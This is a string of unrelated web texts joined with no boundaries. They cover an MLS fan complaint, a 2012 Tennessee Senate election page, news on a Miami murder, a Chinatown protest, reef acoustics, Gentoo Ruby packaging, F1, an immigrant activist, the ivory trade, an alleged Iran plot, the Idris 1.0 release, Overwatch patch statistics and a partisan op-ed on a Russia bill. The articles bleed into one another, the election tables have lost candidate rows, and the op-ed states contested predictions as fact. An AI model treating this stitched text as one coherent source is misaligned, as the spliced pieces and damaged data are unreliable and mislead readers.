How does that make you feel Toronto? You support a team with more of your hard earned money than virtually any other fan in the league. Yet allegedly, your club cannot sign a player with its own money, that will make your team better if that player won't help sell tickets in Columbus or other markets.
Though MLS is a single entity league and each club profits from the health of the whole, at what point do the club's interests super-cede the interests of the league? I get that expense control is an issue that the MLS needs to ensure it stays on top of. Bad deals set bad precedents. Got it. That said, is this about football or not? Do teams not have some freedom to control their own rosters with their own funds? Are we running some version of professional wrestling when it comes to roster building or a competition amongst teams that have an equal chance to develop their squads and ultimately win?
We can debate whether Mellberg would have been the right signing but what shouldn't be up for debate is whether the team has the ability to sign anyone that it feels will make it better. Especially considering it would be using its own funds.
Apparently, it appears that this type of player may never be allowed to play for us unless the league changes its alleged stance.
In looking at how much time, energy and money that I have spent over the last few years in supporting this team, well, based on what I've been told I feel like calling in sick
You can follow me on Twitter @Gardnerfanfuel.
The 2012 United States Senate election in Tennessee took place on November 6, 2012, as part of the general election including the 2012 U.S. presidential election, elections to the House of Representatives and various state and local elections. Incumbent Republican U.S. Senator Bob Corker won a second term. Corker easily won the Republican primary with 85% of the vote. He faced Democratic Party nominee Mark E. Clayton[2] as well as several third-party candidates and several independents.
Clayton won the Democratic nomination with 30% of the vote, despite raising no money and having a website that was four years out of date.[3] The next day Tennessee's Democratic Party disavowed the candidate over his active role in the Public Advocate of the United States, which they described as a "known hate group". They blamed his victory among candidates for whom the TNDP provided little forums to become known on the fact that his name appeared first on the ballot, and said they would do nothing to help his campaign, urging Democrats to vote for "the write-in candidate of their choice" in November.[4] One of the Democratic candidates, Larry Crim, filed a petition seeking to offer the voters a new primary in which to select a Democratic Nominee among the remaining candidates the party had affirmed as bona fide and as a preliminary motion sought a temporary restraining order against certification of the results, but after a judge denied the temporary order Crim withdrew his petition.[5]
Background [ edit ]
The incumbent in the race, former Chattanooga mayor Bob Corker, was elected in 2006 with 50.71% of the vote in a win against U.S. representative Harold Ford, Jr..
Republican primary [ edit ]
Declared [ edit ]
Fred R. Anderson
Mark Twain Clemens, unemployed
Bob Corker, incumbent U.S. Senator
James Durkan, businessman
Brenda Lenard, businesswoman & doctoral student
Zach Poskevich, technology consultant
Polling [ edit ]
Hypothetical polling Poll source Date(s)
administered Sample
size Margin of
error Bob
Corker More
conservative
challenger Other Undecided Public Policy Polling February 9–13, 2011 400 ±4.9% 38% 43% — 19% Poll source Date(s)
administered Sample
size Margin of
error Bob
Corker Marsha
Blackburn Other Undecided Public Policy Polling February 9–13, 2011 400 ±4.9% 50% 30% — 20% Poll source Date(s)
administered Sample
size Margin of
error Bob
Corker Hank
Williams, Jr. Other Undecided Public Policy Polling February 9–13, 2011 400 ±4.9% 66% 13% — 21%
Results [ edit ]
Republican primary results[6] Party Candidate Votes % Republican Bob Corker (Incumbent) 389,483 85.1 Total votes 456,890 100
Democratic primary [ edit ]
Declared [ edit ]
Results [ edit ]
Mark Clayton Gary G. Davis Park Overall David Hancock Results by county:
Democratic primary results[6] Party Candidate Votes % Democratic Mark E. Clayton 48,126 30.0 Total votes 160,331 100
General election [ edit ]
Bob Corker (Republican), incumbent U.S. Senator
Mark E. Clayton (Democratic) [7]
Shaun Crowell (Libertarian)
Martin Pleasant (Green) [8] [9]
Kermit Steck (Constitution) [9] [10]
David Gatchell (Independent)
James Higdon (Independent)
Michel Joseph Long (Independent)
Troy Stephen Scoggin (Independent)
Jacob Maurer (Write-In)[11]
Predictions [ edit ]
Polling [ edit ]
Poll source Date(s)
administered Sample
size Margin of
error Bob
Corker (R) Mark
Clayton (D) Other Undecided Issues and Answers Network Inc. October 16–21, 2011 609 ±4% 59% 21% 4% 15%
Hypothetical polling Poll source Date(s)
administered Sample
size Margin of
error Bob
Corker (R) Phil
Bredesen (D) Other Undecided Public Policy Polling February 9–13, 2011 500 ±4.4% 41% 46% — 12% Poll source Date(s)
administered Sample
size Margin of
error Bob
Corker (R) Jim
Cooper (D) Other Undecided Public Policy Polling February 9–13, 2011 500 ±4.4% 50% 32% — 22% Poll source Date(s)
administered Sample
size Margin of
error Bob
Corker (R) Harold
Ford, Jr. (D) Other Undecided Public Policy Polling February 9–13, 2011 500 ±4.4% 55% 32% — 14% Poll source Date(s)
administered Sample
size Margin of
error Bob
Corker (R) Bart
Gordon (D) Other Undecided Public Policy Polling February 9–13, 2011 500 ±4.4% 52% 29% — 19% Poll source Date(s)
administered Sample
size Margin of
error Bob
Corker (R) Al
Gore (D) Other Undecided Public Policy Polling February 9–13, 2011 500 ±4.4% 53% 38% — 9% Poll source Date(s)
administered Sample
size Margin of
error Bob
Corker (R) Tim
McGraw (D) Other Undecided Public Policy Polling February 9–13, 2011 500 ±4.4% 50% 28% — 22%
Results [ edit ]
United States Senate election in Tennessee, 2012[16] Party Candidate Votes % ± Total votes 2,321,477 100.0% N/A Republican hold
See also [ edit ]
References [ edit ]
on •
THE GUERRILLA ANGEL REPORT — DNA and the victim's obsession with cleanliness helped Miami Beach, Fla., Police nail the killer of trans woman Rosita Hernandez.
Police say it was Miguel Pavon who stabbed Hernandez last March in her South Beach apartment. He is charged with murder and is being held without bond. Although Hernandez's sex worker status complicated the case, her friends were able to point out enough evidence in her apartment for the police lab to get a DNA match.
Pavon was already in jail on another charge when the DNA match was made. Pavon previously gave the police a sample of his DNA over a year ago when he was being investigated for an earlier murder of a different person. Police did not state if the Hernandez murder was a hate crime following his arrest.
I first wrote about the murder back in March: https://lexiecannes.wordpress.com/2012/03/18/still-no-id-details-in-killing-of-south-miami-beach-trans-woman/
[Trigger warning!] Man charged in murder of transgender South Beach prostitute – Miami Beach – MiamiHerald.com.
Tip of the hat to Nancy Greiner Murrell.
————
You're welcome to share this entire article!
Follow this topic on Lexie Cannes' Facebook page: http://www.facebook.com/lexiecannes
Support this site, get the transgender-themed feature film “Lexie Cannes“ DVD here: http://www.lexiecannes.com/id13.html
Associated with Wipe Out Transphobia: http://www.wipeouttransphobia.com/
Share this: Twitter
Facebook
Reddit
LinkedIn
Tumblr
Google
Print
Pocket
Email
Pinterest
Like this: Like Loading...
Categories: Deaths, Murder, Law Enforcement, Police, Transgender, Transsexual, Trans
There was big trouble in London's Chinatown yesterday when every business closed in protest against UK Border Agency (UKBA) collective punishment "fishing" raids in the area.
The popular tourist area ground to a total halt as the government's hard-line Immigration Bill was debated by MPs.
For two hours restaurants, supermarkets, hairdressers and shops in the central London district were deserted as the community took to the streets over a series of draconian immigration raids - 13 local businesses have been invaded by UKBA officers in the last few months.
In a swipe at the Tories, who recently sent London Major Boris Johnson and Chancellor George Osborne to Beijing on a goodwill trip, protesters said that the Chinese community had been criminalised.
London Chinatown Chinese Association spokesman Lawrence Cheng said: "All the existing evidence suggests that the raids were not intelligence-led.
"They have had the same effect as the Go Home or Face Arrest van campaign. They fuel negative stereotyping and racial profiling."
Hundreds crowded under the overhanging Chinese lanterns in Gerrard Street off Leicester Square blowing whistles and chanting "UKBA go away. Chinese community here to stay."
Human rights lawyer Imran Khan told demonstrators that the government consistently treats entire ethnic communities as criminals.
"They have in the past attacked communities up and down the country.
"Today is the turn of Chinatown. Whether we are from this community or others the message is that we are not prepared to take this lying down.
"These fishing raids are unlawful, illegal and unprofessional."
Chinese advice centre Min Quan chairman Bobby Chan - a British resident - was on the sharp end of the government's indiscriminate bully-boy tactics recently when he received a Home Office text message asking him to leave - one of 40,000 sent out despite many of the recipients having a legal right to be in the country.
"The raids and the Immigration Bill are connected," he said. "The government is creating an atmosphere of fear. It's like living in 1984."
Fourteen-year-old Ah-lam released a lone balloon into the air in protest against the raids.
She said: "(The raids) make me scared and sad. Some people's family members have been taken. Nobody wants their family taken apart."
Community leaders admit that some businesses do employ illegal workers, but say that undocumented employees slip through the net because of labour shortages and complicated immigration rules.
Rather than collective punishment the community would like to open a dialogue with the UKBA to help resolve the problem.
The LCCA has written to UKBA but has had no response, Mr Cheng said.
Madz Negro dives to study a reef off the coast of Panama's San Blas Islands. (Credit: Michelle Jakaitis)
Coral reefs have a lot to deal with these days. Ocean acidification is a rising threat, as are warmer ocean temperatures. In addition, studying reefs can involve somewhat invasive methods like sensor deployments or sample extractions. But a student at Illinois Wesleyan University has found that studying reefs doesn't have to be intrusive at all. All scientists have to do, she says, is listen.
Madz Negro, an undergraduate student pursuing degrees in music and ecology at the school, conducted an experiment on reefs near Panama's San Blas Islands in April and May 2015. The work was part of a study abroad trip she took. Using a hydrophone, headphones and a digital recorder, she observed sounds that the reefs gave off as a means to assess their health. By employing similar methods, she says that researchers studying reefs elsewhere can rapidly gauge if they're under stress and then shift efforts to focus on bettering their environments more quickly.
“I wanted to study the sound of coral reefs because I believe that nature is singing or giving off sound that can indicate its current state of being, just as humans do,” said Negro.
She describes the sounds that reefs give off as similar to those coming from a crackling bonfire. And it's not just the reefs that make sound, all the creatures and activities going on around them like to chime in as well.
“You listen for snapping shrimp, barnacles rasping, fish communicating, anthropogenic noises such as boats, and any other sounds present,” said Negro. Putting those all together helps to tell how well the reefs are doing, she says.
For Negro's investigation, she compared the relationship between the sounds recorded with the amounts of live and dead coral present on each reef. Her results were quite telling.
“I ended up actually finding a correlation between the two, which was such an amazing realization! I found that the percentage of dead coral cover negatively correlated with both frequency levels and average high amplitude levels,” said Negro.
It's important to start looking at the relationships between soundscapes and coral health, she says, because researchers can use sound as an unobtrusive way to rapidly survey reef health.
“Therefore, there will be less time spent surveying the reefs' health, and more time spent on repairing the reef or finding ways to prevent further harm,” said Negro. “I believe that, like humans, the Earth is speaking, singing. It is making music that can indicate its current state of being. We need to start listening.”
Top image: Madz Negro dives to study a reef off the coast of Panama's San Blas Islands. (Credit: Michelle Jakaitis)
To make Gentoo a much better platform for Ruby development, I've started working last year on the Ruby-NG eclasses which provide a way to install Ruby extensions for multiple Ruby implementations in parallel (leaving to the user the choice for what to install them — unlike Python). I say “eclasses” because one is general and another is used to install RubyGems-based packages, with “fake” specifications that sidestep problematic dependencies and other similar issues.
Now, when I started implementing this, my idea was to add support for Ruby 1.9 and JRuby (both of which were missing before), but the result was suitable for Ruby Enterprise as well, which Alex has been working on lately. The end result is that, for standalone Ruby extensions, the eclasses were well received, and more than half the tree now uses the new eclasses:
Update (2016-04-29): This used to include live graphs, but these graphs are now lost, I'm sorry.
What we haven't yet experimented too much with is using the new eclasses to support bindings that are part of bigger packages, like obexftp which is still broken. I guess is another reason why you should split foreign language bindings rather than keep them monolithically inside the single package. I was talking about this with Hans today and I think this is one of the things we should work on soon, if we want to deprecate the old eclasses.
As it is, just a handful of simple Ruby extensions are missing to be migrated before we can “safely” unmask Ruby 1.9 (I say “safely” because I expect the tinderbox to go crazy once Ruby 1.9 is unmasked and selected, but that's beside the point now).
Now, back to Ruby 1.8 and Enterprise. Since I had to fix the two of them for BerkDB 5.0 I decided to backport the patch I made for Ruby 1.9 to enable --no-undefined when linking extensions. Interestingly enough, this shown up the problem (already fixed by Alex) with the OpenSSL bindings in the upstream package — remind you of something?
Enabling the --no-undefined flag on all the Ruby versions available, means that we can be sure that the extensions built will work as intended on all of them, and that a patch from one version won't break it on another. Well, it does not give us 100% safety, but it at least increases it. Without this change, adding a call to a newly-introduced function could produce a non-working extension without warning, but for an abort at runtime.
Unfortunately this does not happen without consequences and false positives; ruby-gstreamer is an example of this: it fails because of the undefined symbols in the extension; the extension is not broken (but the ebuild is), it simply needs another extension to provide those symbols before it is loaded. I think this is a very rare situation and I'd rather deal with this on a case-by-case basis rathe than leave all the undefined references as “fine” — I said that the ebuild is broken; the problem is that the extension needs ruby-glib at runtime and we currently don't depend on it at all.
The next steps are obviously to run the tinderbox with all the Ruby implementations enabled and see how it works out, so that maybe we can improve the lines on this graph:
Update (2016-04-29): This used to include live graphs, but these graphs are now lost, I'm sorry.
To improve these situations, I tried to solve the test-unit problem. Ruby 1.9 ships with a reduced test-unit implementation (which is what is also available as minitest in Gentoo, for 1.8, JRuby and EE); since most testsuite need the full-blown test-unit interface, there is a test-unit gem to provide it for Ruby 1.9. It's not entirely API compatible, but it comes very near to that. After this, another implementation was created, test-unit-2, which is even less API compatible but provides enhanced features, and works on (almost) all implementation – it fails on JRuby maybe for a JRuby bug.
Unfortunately, auto-gem loading causes test-unit-2 from loading on all the implementations, if installed, which is the reason why we're keeping it masked. While I still haven't found a proper solution to deal with this; the best choice I can see now is just depend on the 1.x series of test-unit (only available for Ruby 1.9) by default; depend on test-unit-2 if the package needs it; and block test-unit-2 if the package fails tests with it installed. This should allow covering most of the needs of our users.
Finally, a request if somebody feels like playing a bit around with Unix commands, to improve the way we currently install the Ruby-NG based ebuilds. Since we install for up to four targets at the same time, most of the time we install multiple copies of the same files. They can easily become a problem. While I know there is a (very incomplete) work for btrfs to support live data de-duplication, it would be very nice if we could, at some point, reduce the waste due to this, without relying on the filesystem.
I'm afraid I have no knowledge on how to do that, but if we could just run some pass of software after the installation is complete (we can easily hook stuff like that up in the eclass) we could then use hardlinks between the files that are identical rather than having to install them multiple times.
Anyway, this is enough for now, news will follow, and please let us know if an extension that “worked” before now fails to build for undefined symbols… we'll have to deal with them, one way or the other!
Alonso qualified 12th for the Austrian Grand Prix at the Red Bull Ring, but was just 0.052s off 10th-placed Esteban Ocon of Force India in Q2.
This was despite using an older specification of Honda engine, after a problem was detected on Friday night on his 'Spec 3' unit.
“It was good,” said Alonso, whose only Q3 appearance this year occurred at the Spanish GP. “I'm happy with the laps and the performance today.
“I think the car felt good all weekend, and I think this position is the maximum we could achieve today.
“The team is working very hard to improve the situation, we bring I don't know how many updates every race, new specs on the engine every time we can.
“Now we are touching Q3 in normal circumstances, so that's a positive note. But we still need to improve the reliability and we hope to see some more signs in the next couple of weeks.”
When asked if he could score points on Sunday, Alonso replied: “Starting P12, we are already very close, so with a good start or good strategy you're already in the points.
“That's the target.”
Undocumented immigrant, Denver resident and longtime activist Jeanette Vizguerra is one of the 100 most influential people in the world.
So says TIME magazine, which included Vizguerra on its list as one of 20 “icons” this morning alongside the likes of Colin Kaepernick, RuPaul and Viola Davis.
“She shed blood, sweat and tears to become a business owner, striving to give her children more opportunities than she had,” wrote actress America Ferrera in the TIME blurb honoring Vizguerra. “This is not a crime. This is the American Dream.”
It's an honor Vizguerra, 45, is proud — and humbled — to accept. Originally from Mexico, she has worked as an advocate for undocumented immigrants in Colorado for more than a decade.
“It doesn't matter how hard this struggle becomes or how long it lasts, because nobody can take our dignity and no one will take our children from us,” she said during a press conference this morning accepting the award. She ended her remarks with a common refrain in the immigrant rights community: Sin papeles, sin miedo — no papers, no fear.
But unless Vizguerra hears from U.S. immigration officials soon, she won't be able to make it to the prestigious TIME 100 Gala in New York next week to accept the award.
Since Feb. 15, she has been living in the basement of the First Unitarian Church in downtown Denver, where she chose to take deportation sanctuary rather than appear for a scheduled check-in with Immigration and Customs Enforcement. ICE has typically avoided taking deportation action in churches and schools.
On the day of the appointment, her most recent stay of deportation had expired and she still hadn't received word from ICE about her request for an extension. She had a sinking feeling that showing up for the appointment would lead to her detention. Immigration officials officially denied her stay when she failed to appear.
Vizguerra's award comes one week after another undocumented Colorado immigrant, Maria de Jesus Jimenez Sanchez, was detained and ordered deported after appearing for a scheduled ICE appointment.
RELATED: Aurora mother headed for deportation after ICE check-in
ICE said in a statement following its decision that stays of removal are “typically issued to allow the individual time to prepare to leave the United States” and are not intended to be a long-term solution. The agency also said that Vizguerra is an “ICE enforcement priority” because she has two immigration-related misdemeanor convictions for using a false Social Security number and has had a deportation order since 2011.
Vizguerra, who has lived in Denver for more than 20 years, has an adult daughter and three young children. She currently has a pending application for a U-visa, available to victims of violent crime who cooperate with law enforcement.
Immigration attorney Hans Meyer is thrilled that his client has been honored by TIME. Her courage “to stand true against the nativism of the Trump administration,” he said, “serves as a humbling reminder of what the real American values of courage, dedication, and perseverance look like.”
Meyer says ICE “broke its own rules” in failing to extend a stay of deportation to Vizguerra, who was not considered a deportation priority under President Barack Obama.
U.S. Rep. Jared Polis, whom Vizguerra thanked this morning for his efforts on her case, feels the same way. Shortly after she entered sanctuary, Polis publicly said that the ICE official who denied her stay of deportation was acting against agency policy as a “rogue agent.” ICE said the accusation amounted to “name-calling and vilifying” the agent.
RELATED: Colorado congressman: “Rogue” ICE agent drove Denver immigrant into sanctuary
Meyer hopes to hear from ICE in the next few days with information about Vizguerra's case, but said he has no idea when to expect such news. ICE spokesman Carl Rusnok told The Colorado Independent that the agency does not release information on future operations, for security reasons.
Immigration activists are pleased with the prestigious TIME honor, but say that Vizguerra's situation demonstrates the hardship of being an undocumented immigrant in the United States, particularly under President Donald Trump.
“Even still, in ICE's eyes, [Vizguerra] is not worthy of a stay of removal,” said Julie Gonzales, who works as the policy director for the Meyer Law Office. “It calls the question: What does an immigrant have to do in Donald Trump's America to be able to stay in the United States with her family?”
On his visit to Tanzania on Monday, President Obama will unveil a new, $10 million initiative to curb rhinoceros and elephant poaching in Africa. International trade in illegal rhino horns and elephant tusks, driven in large part by rising demand in China and Thailand, is rapidly depleting the animals' populations in Africa. Obama's plan significantly increases American involvement in the issue, which Hillary Clinton also worked on as secretary of state. But this map, from a recent United Nations report, shows just how vast of an industry this has become:
These are the contours of the global ivory trade. Click to enlarge. (UNEP/GRID-Arendal)
The big problem is that time is running out. A 2011 study estimated that 7.4 percent of all African elephants may have been killed by poachers that year alone. From 1998 to 2007, the global ivory trade doubled, according to the International Union for Conservation of Nature. Since 2007, it has doubled again. And the trade is shifting from small smuggler networks to large-scale operations: seizures of 800-plus kilos of illegal ivory shipments (that's about 1 ton) have doubled just since 2009. Elephants and rhinos are simply being wiped out, and quickly.
The other problem is economics, the simple force of which might be too much to overcome. Some of the countries trafficking in ivory and rhino tusks are among the poorest per capita in the world. Elephant tusks are worth $1,000 per pound, Ginette Hemley of the World Wildlife Fund told my colleague Juliet Eilperin; rhino horns sell for $30,000 per pound, about twice as much as gold. By comparison, Afghan opium farmers can charge about $606 per pound.
In Tanzania, 85 percent of exports are agricultural. One of its biggest exports is cashews, prices of which have been so low that 85,000 tons of Tanzanian cashews went unsold last year. In April, cashew farmers in the country rioted over low prices and stalled exports, destroying 24 buildings in the capital. Gross domestic product per capita by purchasing power parity is only $1,700 per person, ranked 200th in the world.
How do you deter Tanzanians – not to mention Kenyans, Mozambicans, Zambians, Zimbabweans and South Africans – from cultivating something so wildly lucrative as rhino horns and elephant tusks? The executive order creating a special task force for the issue seems to focus largely on enforcement, which advocates say is underfunded. But that's only part of the issue.
The comparison is imperfect, but it's hard not to think of U.S. efforts to curb illegal narcotics trafficking in Latin America. Even huge and costly efforts, including an all-out military assault by the Mexican government against drugs cartels, have not been able to overcome the economics of demand creating supply. The Obama administration gets this and has pushed China to try to curb its own demand, driven by a rapidly growing middle class that sees the valuable animal bones as status symbols and, sometimes, traditional medicinal ingredients.
Better law enforcement, whether against drug traffickers or ivory poachers, tends to drive up prices. That often encourages more people to start selling. But at some point, in theory, it will price out potential buyers. This is really hard to do with an addictive substance like opium but, in the past, there have been some successes with ivory, which used to be sold much more heavily in Europe and Japan but isn't anymore. Better enforcement is probably not going to halt all ivory shipments or certainly all ivory poaching, both of which are difficult to monitor and, given the economic incentives, even tougher to deter. The challenge is changing the incentives.
As I wrote a few weeks ago, there is illegal ivory just about everywhere. But the demand outside of Africa and East Asia tends to be much lower for two reasons: well-enforced laws and cultural taboos. The perception that buying ivory is wrong helped drive down Western demand for ivory in the 1980s, after a series of successful awareness campaigns. Around the same time, the world began implementing the Convention on International Trade in Endangered Species of Wild Fauna and Flora, a 1973 treaty that limited the ivory trade.
"The act of buying an ivory trinket is creating a situation that will see elephants and rhinos driven into extinction," Paul Mbugua, spokesman for the state-run Kenya Wildlife Services, told Al Jazeera. He estimated that, if trends continue, the animals have 10 years left.
Image caption Manssor Arbabsiar appeared at a court in New York City on Tuesday
Iran terms the US allegations ridiculous, baseless, and fabricated.
The government has summoned the Swiss Ambassador to Tehran to protest (Washington and Tehran do not have diplomatic relations, so Switzerland represents US diplomatic interests in Iran).
"No doubt this is a new American-Zionist plot to divert the public opinion from the crisis Mr Obama is grappling with," Iranian lawmaker Ala'eddin Borujerdi told the Fars news agency.
"Americans are seeking to derail the public opinion from the Wall Street uprising."
The US government's allegation is clear: a branch of Iran's Revolutionary Guard Corps (IRGC) directed 56-year-old Iranian-American Manssor Arbabsiar to hire a Mexican drug cartel to assassinate Saudi Arabia's ambassador to Washington.
The assassination was to be carried out in Washington, possibly as the ambassador dined in a restaurant.
'Exercising caution'
Court documents submitted by the FBI make it clear that Mr Arbabsiar was acting on specific instruction from officers inside Iran. "Arbabsiar admitted that in connection with this plot, he was recruited, funded, and directed by men he understood to be senior officials in the Quds Force."
Image caption Iran's Revolutionary Guard Corps employs up to 150,000 people
The Quds Force is a branch of the powerful IRGC. The guard itself was created after the 1979 Revolution to enforce Islamic rule.
It has become the most powerful institution in Iran and employs up to 150,000 people. Experts believe that the Quds Force within the IRGC is made up of 5,000 operatives.
"The IRGC's secretive Quds Force has trained and equipped proxy groups, such as Hezbollah, Hamas, Iraqi Shia insurgents, and even elements of the Taliban," wrote analyst Alireza Nader in the book The Iran Primer.
"Some surrogates have already been used to target US and other Western forces in Lebanon, Iraq and Afghanistan."
The US government has accused the Quds Force of providing explosives used against US troops in Iraq, and also of providing material help to the Syrian government to crush this year's opposition protests.
But, crucially, the Quds Force has not gone after targets inside the US.
That is why many Iran observers are initially hesitant about the charge that the Quds Force has been seeking to carry out a major bomb attack in Washington DC - a more daring operation than its previous activities.
"I am not saying that this did not happen but we need to exercise caution at this point," says Professor Scott Lucas, an expert in US-Iranian affairs at Birmingham University.
"We have almost no information about the person named in the complaint. Nor do we have any information about alleged involvement of higher-ups beyond that which was put out by the US authorities."
Amateur or reckless?
Observers focus on two main questions.
Media playback is unsupported on your device Media caption US Attorney General Eric Holder says the alleged conspiracy was "conceived, sponsored and directed from Iran"
Firstly, why would the Quds Force use Mr Arbabsiar as its principal agent for what would have been one of the boldest operations in its history?
Reports say that he has a criminal record in Texas for evading arrest and theft.
"I would be surprised if the Quds Force used such an unreliable asset in its operations given his track record," Prof Lucas.
Secondly, why would the Quds Force believe that a Mexican drug cartel would be prepared to carry out a bomb attack in Washington?
Mexican drug cartels are multi-billion dollar businesses interested in self-preservation. Carrying out a major attack in Washington DC for the relatively small sum of $1.5m would risk bringing the US military on to the cartels' own ground in Mexico.
It may be that the Quds Force is more amateur or reckless in the planning of its operations than previously thought.
But many will want an answer to a simple question: why would this special branch of the Revolutionary Guards seek such a dramatic change in the way that it operates?
Idris version 1.0 has been released. You can find it on hackage or from the download page. Documentation is available from docs.idris-lang.org.
Thanks to everyone who has contributed, whether by providing code, documentation, testing, issue reports, or encouragement. You can find the names of the contributors in the source repository.
What do we mean by “1.0”?
Idris version 1.0 corresponds to the language as described in Type-Driven Development with Idris, published last week by Manning.
As described here, there is still much to do. Idris is primarily a research tool, arising from research into software development with dependent types which aims to make theorem proving and software verification accessible and practical for software developers in general. In calling this “1.0”, we mean no more than that the core language and base libraries are stable, and that you can expect any code that compiles with version 1.0 to compile with any version 1.x.
Since Idris has less than one person working on it full time, we don't promise “production readiness”, in that there is still a lot to do to make the compiler and run time efficient, and there may be libraries you need which are not available. And, there will certainly be bugs! Please let us know via the issue tracker if you encounter any problems.
Contributions
We will always welcome contributions, however small. Some specific contributions needed are described on the wiki.
Have fun!
Community
You can get in touch in several ways:
Mailing list Long-form discussion happens on the mailing list. IRC There is also an irc channel #idris on freenode. Point your irc client to chat.freenode.net then /join #idris . Alternatively, there is a web interface. Twitter @idrislang on Twitter GitHub The Idris source is available from our repository. Tools and code by the wider Idris community are available in a GitHub organisation.
All participants in these forums are requested to abide by the community standards.
Patch Changes...
Orisa's Big Boost to Damage Blocking
Impact of Attack Ability Changes
What About Winrates?
Patch Winners and Losers?
The new latest Overwatch patch has been available for a couple of weeks now. How have the updated heroes fared amidst the changes? To help answer that question we collect average performance stats per competitive match for each of the tiers (Bronze->Grandmaster) and compare the heroes of the new patch directly against their old counterparts. For the four heroes we look at, this represents more than 200,000 matches of game data. As the the data shows, Orisa seems to be the biggest winner by far and possibly even more viable on ladder.Follow OmnicMeta articles on Twitter or Facebook For information on our data, see the About page. Patch 1.11.1.2A brought a collection of hero changes . The main changes we focus on are the major changes to Orisa, Reinhardt, Soldier:76, and Hanzo. To summarize: Orisa gets a barrier cooldown change from 12 to 8 seconds and a 9% weapon damage nerf, Reinhardt gets height reduction on earthshatter also affecting height climbing ability of the ultimate, Hanzo gets a 10% increase in arrow charge speed, and Soldier gets a 5% primary weapon damage nerf.Arguably the biggest patch change is the massive reduction in cooldown to Orisa's protective barrier. The goal of the change was enabled Orisa to better protect the front line of her team, while also enabling more frequent repositioning of the barrier.The figure above compare the damage blocked for Tanks. Before the patch, Orisa blocked the same amount of damage as Reinhardt on average, and nearly double that of DVa and Winston. After the patch, Orisa's effective damage blocking has been increased by 22% on average. This massive boost in blocking ability has put Orisa far in front of Reinhardt. Discussion online have questioned the effectiveness of Orisa's shield versus Reinhardt's, but with this huge buff it certainly seems like a niche is being carved out for Orisa.The rest of the patch changes center around offensive abilities - weapon damage (Soldier, Orisa), damage per second (Hanzo) and ultimate ability (Reinhardt). To evaluate the net impact, we look for changes in eliminations per competitive game.The figure above presents the old patch versus the current patch (Note that the Y-axis stats at sixteen - not zero). For eliminations, Hanzo's arrow charge speed change appears to be a big net buff. His eliminations per game have gone up 9% on average since the last patch, and the closest offensive hero comparison in terms of elimination impact is McCree. Putting aside the obvious projectile vs hitscan arguments, both heroes have a high weapon burst damage, and a similar number of eliminations and damage across the tiers. Adding in the utility of sonic arrow, Hanzo appears to be in a good place right now.Reinhardt experiences the largest drop in eliminations per game since the last patch across all heroes. His eliminations are down an average of 7% across all the competitive tiers. The reasons for this decrease are likely more complex and not only attributable to to nerf to his ultimate ability. Other contributing factors to the drop include bugs being reported for hammer swing hits and dive team compositions being much more prominent this season. Either way, it seems like Reinhardt is in a significantly worse place than last season.The changes to weapon damage appear to have affected Soldier and Orisa much less. Orisa sees no net loss in eliminations on average, while soldier experiences a 3% drop in eliminations. This is good news for both heroes, despite the knee jerk reactions evident in massive declines in Soldier's popularity on PC and Console The above chart shows the change in winrates from the old patch to the current patch. Positive values indicate that the heroes are winning more on the current patch, while negative values indicate the heroes are losing more often. Based solely on the winrates, we can get a feel for whether the patch was a net positive or negative for each hero affected. Of course, meta changes and preferences also can affect winrates. From the data, we see that Hanzo and Orisa's winrates have generally jumped, in some cases 4% or more, depending on the tier. While Hanzo has traditionally been a hero with a <50% winrate across the tiers, he now is approaching >50% territory for the first time. For Orisa, she now has respectably high winrates, including 54% and 55% at Diamond and Master tiers, and above the average winrate for all tiers except Grandmaster. Despite the reduction in eliminations and damage, Reinhardt's winrate remains roughly the same, reflecting the thought that the patch didn't harm him very much. However, Soldier's winrate drops a bit at low tiers, where players are possibly less able to be as productive with him.All in all the patch changes seem to have especially benefited Orisa. Her winrate are now significantly above average (and far above at Diamond and Masters), and her damage blocked per game is now the highest of all heroes in the game by a significant margin. Is now the time to start playing Orisa? Possibly, but as always time will tell. For the other heroes, Hanzo gets a nice boost, while Soldier is a clear nerf and Reinhardt's changes don't seem to have affected him very much.
The Russian Aggression Prevention Act”, introduced to Congress by U.S. Senator Bob Corker (R-Tenn.), will set the US on a path towards direct military conflict with Russia in Ukraine.
Any US-Russian war is likely to quickly escalate into a nuclear war, since neither the US nor Russia would be willing to admit defeat, both have many thousands of nuclear weapons ready for instant use, and both rely upon Counterforce military doctrine that tasks their military, in the event of war, to preemptively destroy the nuclear forces of the enemy.
RAPA provides de facto NATO membership for Ukraine, Georgia, and Moldova via RAPA
The Russian Aggression Prevention Act, or RAPA, “Provides major non-NATO ally status for Ukraine, Georgia, and Moldova for purposes of the transfer or possible transfer of defense articles or defense services.” Major non-NATO ally status would for practical purposes give NATO membership to these nations, as it would allow the US to move large amounts of military equipment and forces to them without the need for approval of other NATO member states. Thus RAPA would effectively bypass long-standing German opposition to the US request to make Ukraine and Georgia part of NATO.
Germans rightly fear placing US/NATO troops and US Ballistic Missile Defense (BMD) in Ukraine, given the profound and long-standing Russian objections against the expansion of NATO (especially to Ukraine and Georgia) along with deployment of European US/NATO BMD. Germany is acutely aware of the distinct possibility that the civil war raging in Ukraine could evolve into a Ukrainian-Russian war. Under such circumstances, deployment of US/NATO forces in Ukraine would make it virtually inevitable they would come into fight with Ukraine against Russia.
RAPA would accelerate the “implementation of phase three of the European Phased Adaptive Approach for Europe-based missile defense . . . by no later than the end of calendar year 2016.” In 2012, Russia's highest ranking military officer stated that Russia might consider a pre-emptive strike against such BMD deployments “when the situation gets harder.”
RAPA “Directs DOD [US Department of Defense] to assess the capabilities and needs of the Ukrainian armed forces” and “Authorizes the President, upon completion of such assessment, to provide specified military assistance to Ukraine.” RAPA would have the US quickly supply Ukraine with$100 million worth of weapons and equipment, including anti-tank and anti-aircraft weapons, crew weapons, grenade launchers, machine guns, ammunition, and Mine Resistant Ambush Protected vehicles.
RAPA requires the Obama administration to
“use all appropriate elements of the United States national power…to protect the independence, sovereignty, and territorial and economic integrity of Ukraine and other sovereign nations in Europe and Eurasia from Russian aggression.” This includes “substantially increasing United States and NATO support for the armed forces of the Republics of Poland, Estonia, Lithuania, and Latvia,” and “substantially increasing the complement of forward-based NATO forces in those states.”
Consequently, RAPA would produce significant buildups of US/NATO forces into Poland and the Baltic States, accelerate the construction of US BMD systems in Eastern Europe, and authorize substantial U.S. intelligence and military aid for Ukrainian military forces that continue to lay siege to the largest cities in Eastern Ukraine. If RAPA did not result in the deployment of US forces to Ukraine, it would certainly position them for rapid deployment there, in the event that the Ukrainian civil war escalates into a Ukrainian-Russian conflict.
RAPA intensifies support for ethnic cleansing in Eastern Ukraine
